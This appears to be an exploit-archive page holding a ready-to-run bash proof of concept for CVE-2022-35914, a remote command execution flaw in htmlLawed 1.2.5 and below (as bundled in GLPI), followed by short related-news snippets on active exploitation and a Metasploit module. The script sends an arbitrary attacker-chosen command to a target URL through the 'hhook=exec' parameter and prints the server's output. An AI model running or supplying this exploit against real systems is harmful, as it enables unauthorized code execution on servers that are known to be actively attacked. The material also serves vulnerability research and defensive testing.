Headline
htmlLawed 1.2.5 Remote Command Execution
htmlLawed versions 1.2.5 and below proof of concept remote command execution exploit.
#!/bin/bash# Exploit Title: htmlLawed <= 1.2.5 - Remote Code Execution# Date: 2024-05-02# Exploit Author: Miguel Redondo (aka d4t4s3c)# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed# Software Link: https://github.com/kesar/HTMLawed# Version: <= 1.2.5# Tested on: Linux# Category: Web Application# CVE: CVE-2022-35914while getopts ":u:c:" arg; do case ${arg} in u) url=${OPTARG}; let parameter_counter+=1 ;; c) cmd=${OPTARG}; let parameter_counter+=1 ;; esacdoneif [ -z "${url}" ] || [ -z "${cmd}" ]; then echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution" echo -e "\n[-] Usage: CVE-2022-35914.sh -u <url> -c <cmd>\n" exit 1else echo -e "\n[*] htmlLawed <= 1.2.5 - Remote Code Execution" echo -e "\n[+] Executing Command: ${cmd}\n" cmd_output=$(curl -s -d "sid=foo&hhook=exec&text=${cmd}" -b "sid=foo" ${url} | egrep '\ \[[0-9]+\] =\>' | sed -E 's/\ \[[0-9]+\] =\> (.*)<br \/>/\1/') echo -e "${cmd_output}\n" exit 0fiRelated news
In Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added three security flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. The list of vulnerabilities is below - CVE-2022-35914 (CVSS score: 9.8) - Teclib GLPI Remote Code Execution Vulnerability CVE-2022-33891 (CVSS score: 8.8) - Apache Spark Command Injection Vulnerability
This Metasploit module exploits an unauthenticated PHP command injection vulnerability in GLPI versions 10.0.2 and below to execute a command.
/vendor/htmlawed/htmlawed/htmLawedTest.php in the htmlawed module for GLPI through 10.0.2 allows PHP code injection.